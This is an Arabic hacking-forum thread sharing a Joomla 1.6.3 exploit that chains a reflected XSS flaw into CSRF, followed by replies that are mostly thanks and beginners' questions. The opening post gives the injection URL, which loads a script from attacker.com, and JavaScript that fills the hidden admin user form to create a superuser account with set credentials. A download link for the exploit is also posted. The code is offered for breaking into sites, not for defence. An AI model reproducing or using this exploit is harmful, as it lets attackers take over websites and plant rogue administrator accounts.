آخر ثغرات الجوملة

[Dr.Mix]

سلام يا اخوان كيفكم انشاء الله بالف خير

اليوم جايب لكم اخر الثغرات في الجوملة

This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.
***65279;
/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
 
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>
 
*/
********.writeln('<iframe id="iframe" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></iframe>');
 
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
 
********.getElementById("iframe").content********.forms[0].jform_name.value = name;
********.getElementById("iframe").content********.forms[0].jform_username.value = username;
********.getElementById("iframe").content********.forms[0].jform_password.value = password;
********.getElementById("iframe").content********.forms[0].jform_password2.value = password;
********.getElementById("iframe").content********.forms[0].jform_email.value = email;
********.getElementById("iframe").content********.forms[0].getElementById("1group_8").checked=true;
********.getElementById("iframe").content********.getElementsByTagName("a")[11].onclick();

طبق هادا على الموقع المصاب :
index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1

انشاء الله تكون شغالة

اخوكم الهكر المحشش(Haboubamix) :lol:

 

[ViRuS Qalaa]

مشكور اخي ع الثغرة
​

 

[JetLi]

ارجو الرفع في المرفقات لان المنتدى يحجب بعض الاكواد

 

[Dr.Mix]

لقد تم يا اخي الرفع في 4shared

http://www.4shared.com/get/V1OomLZi/Joomla_Exploit_---vbspiders--.html

 

[fantasy--xX]

اخوي انا مبتدئ لكن لما القى الموقع المصاب واحط الثغرة واروح مصدر الصفحة ما القى اللي تقول عليها

اعذرني اذا انا غلطان لاني مبتدئ جدا جدا ما اعرف غير ثغرة السكيول الكلاسيكية

 

[Dr.Mix]

اخي والله ما فهمت اي شيئ في كلامك المرجوا التفسير اخي

 

[vpn_31]

تسلم عطرح سغره

 

[4nT! H3lL]

شكرا ع الثغره

 

[dahapp]

مشكور ياغالى

 

[bayrem23]

مشكور ياغالى​

 

[migamix]

أين سكريب الجافا تاع الاستغلال ؟؟ joom163.js
http://attacker.com/joom163.js
سآل من فضلك
هل جربت التغرة علي أحد المواقع ؟؟؟
وهل نجحت في الاقتحام
أرجو الرد أخي
في انتضارك

 

[DR.THMoORY]

صراحه سكربت جوملا زادت ثغراته كتير.. وكل واحده اقوى من التانيه..
يسلمو حبيبي على الثغره

 

[Mr.Louai]

مشكور ياغالى​

 

[hack!n9]

ارجو توضيح لتغرة لانها غير وادحة وباقي في غمود